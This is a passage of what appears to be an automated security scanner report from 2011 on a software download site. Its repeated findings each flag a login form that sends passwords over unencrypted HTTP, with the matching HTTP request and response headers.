Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.218. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /a-oz-insight-1768-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /a-oz-insight-1768-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:52:08 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 26030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.219. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%221%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79639


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.220. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-business-downloads-2-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%222%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85656


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.221. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:33 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2239%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83121


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.222. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2240%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66926


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.223. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-communications-downloads-3-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:39 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.224. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:41 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2241%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79258


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.225. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2242%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81866


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.226. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2243%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.227. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52725


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.228. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2248%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76989


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.229. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2249%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78664


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.230. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2245%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44061


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.231. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2246%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81531


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.232. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2247%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.233. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-desktop-downloads-4-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%224%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.234. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-development-downloads-5-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%225%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77292


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.235. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-education-downloads-6-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
